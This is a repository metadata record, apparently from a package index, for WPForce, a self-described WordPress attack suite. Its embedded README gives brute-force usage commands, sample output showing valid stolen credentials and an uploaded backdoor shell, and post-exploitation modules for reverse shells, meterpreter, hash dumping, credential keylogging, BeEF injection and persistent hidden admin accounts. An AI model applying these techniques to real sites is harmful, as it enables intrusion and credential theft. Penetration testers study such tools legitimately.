{"id":13389929,"url":"https://github.com/n00py/WPForce","last_synced_at":"2025-03-13T14:32:17.915Z","repository":{"id":38816237,"uuid":"54152306","full_name":"n00py/WPForce","owner":"n00py","description":"Wordpress Attack Suite","archived":false,"fork":false,"pushed_at":"2021-02-16T23:47:36.000Z","size":142,"stargazers_count":953,"open_issues_count":11,"forks_count":227,"subscribers_count":49,"default_branch":"master","last_synced_at":"2025-03-12T13:08:37.645Z","etag":null,"topics":["hacking-tool","javascript","keylogger","pentest-tool","php","reverse-shell","wordpress","wordpress-attack","xss-exploitation"],"latest_commit_sha":null,"homepage":"https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n00py.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-03-17T21:20:14.000Z","updated_at":"2025-03-12T06:58:48.000Z","dependencies_parsed_at":"2022-07-17T08:46:34.189Z","dependency_job_id":null,"html_url":"https://github.com/n00py/WPForce","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FWPForce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n00py","download_url":"https://co
deload.github.com/n00py/WPForce/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422708,"owners_count":20288506,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking-tool","javascript","keylogger","pentest-tool","php","reverse-shell","wordpress","wordpress-attack","xss-exploitation"],"created_at":"2024-07-30T13:01:40.324Z","updated_at":"2025-03-13T14:32:17.888Z","avatar_url":"https://github.com/n00py.png","language":"Python","readme":"![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)\n# WPForce - Wordpress Attack Suite \n\n## ABOUT:\nWPForce is a suite of Wordpress Attack tools.  Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found.  
Yertle also contains a number of post-exploitation modules.\n\nFor more information, visit the blog post here: \nhttps://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/\n\nBlogs in other languages: \n\nChinese -    www.mottoin.com/100381.html \n\nPortuguese - http://www.100security.com.br/wpforce/ \n\nSpanish -    http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html \n             \n   https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/\n\nRussian -    https://hackware.ru/?p=2547\n\nFrench -     https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/ \n\nTurkish -    http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html\n\n\n## FEATURES:\n* Brute force via the API, not the login form, bypassing some forms of protection\n* Can automatically upload an interactive shell\n* Can be used to spawn a full-featured reverse shell\n* Dumps WordPress password hashes\n* Can backdoor authentication function for plaintext password collection\n* Inject BeEF hook into all pages\n* Pivot to meterpreter if needed\n\n\n## INSTALL:\n```\nYertle requires the requests library to run.\nhttp://docs.python-requests.org/en/master/user/install/\n```\n\n## USAGE:\n```\npython wpforce.py -i usr.txt -w pass.txt -u \"http://www.[website].com\"\n\n   ,-~~-.___.       
__        __ ____   _____\n  / |  x     \\      \\ \\      / /|  _ \\ |  ___|___   _ __  ___  ___\n (  )        0       \\ \\ /\\ / / | |_) || |_  / _ \\ | '__|/ __|/ _ \\.\n  \\_/-, ,----'  ____  \\ V  V /  |  __/ |  _|| (_) || |  | (__|  __/\n     ====      ||   \\_ \\_/\\_/   |_|    |_|   \\___/ |_|   \\___|\\___|\n    /  \\-'~;   ||     |\n   /  __/~| ...||__/|-\"   Brute Force Attack Tool for Wordpress\n =(  _____||________|                 ~n00py~\n\nUsername List: usr.txt (3)\nPassword List: pass.txt (21)\nURL: http://www[website].com\n--------------------------\n[xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN\n--------------------------\n--------------------------\n[xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!\n--------------------------\n 100% Percent Complete\nAll correct pairs:\n{'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}\n\n -h, --help            show this help message and exit\n  -i INPUT, --input INPUT\n                        Input file name\n  -w WORDLIST, --wordlist WORDLIST\n                        Wordlist file name\n  -u URL, --url URL     URL of target\n  -v, --verbose         Verbose output. Show the attemps as they happen.\n  -t THREADS, --threads THREADS\n                        Determines the number of threads to be used, default\n                        is 10\n  -a AGENT, --agent AGENT\n                        Determines the user-agent\n  -d, --debug           This option is used for determining issues with the\n                        script.\n\n\npython yertle.py -u \"[username]\" -p \"[password]\" -t \"http://www.[website].com\" -i\n     _..---.--.    __   __        _   _\n   .'\\ __|/O.__)   \\ \\ / /__ _ __| |_| | ___\n  /__.' 
_/ .-'_\\    \\ V / _ \\ '__| __| |/ _ \\.\n (____.'.-_\\____)    | |  __/ |  | |_| |  __/\n  (_/ _)__(_ \\_)\\_   |_|\\___|_|   \\__|_|\\___|\n   (_..)--(.._)'--'         ~n00py~\n      Post-exploitation Module for Wordpress\n\nBackdoor uploaded!\nUpload Directory: ebwhbas\nos-shell\u003e\n\n\n\n  -h, --help            show this help message and exit\n  -i, --interactive     Interactive command shell\n  -r, --reverse         Reverse Shell\n  -t TARGET, --target TARGET\n                        URL of target\n  -u USERNAME, --username USERNAME\n                        Admin username\n  -p PASSWORD, --password PASSWORD\n                        Admin password\n  -li IP, --ip IP       Listener IP\n  -lp PORT, --port PORT\n                        Listener Port\n  -v, --verbose         Verbose output.\n  -e EXISTING, --existing EXISTING\n                        Skips uploading a shell, and connects to existing\n                        shell\n\n\n```\n\nYertle currently contains these modules:\n\n```\nCore Commands\n=============\n \nCommand                   Description\n-------                   -----------\n?                         
Help menu\nbeef                      Injects a BeEF hook into website\ndbcreds                   Prints the database credentials\nexit                      Terminate the session\nhashdump                  Dumps all WordPress password hashes\nhelp                      Help menu\nkeylogger                 Patches WordPress core to log plaintext credentials\nkeylog                    Displays keylog file\nmeterpreter               Executes a PHP meterpreter stager to connect to metasploit\npersist                   Creates an admin account that will re-add itself\nquit                      Terminate the session\nshell                     Sends a TCP reverse shell to a netcat listener\nstealth                   Hides Yertle from the plugins page\n```\n","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FWPForce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn00py%2FWPForce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FWPForce/lists"}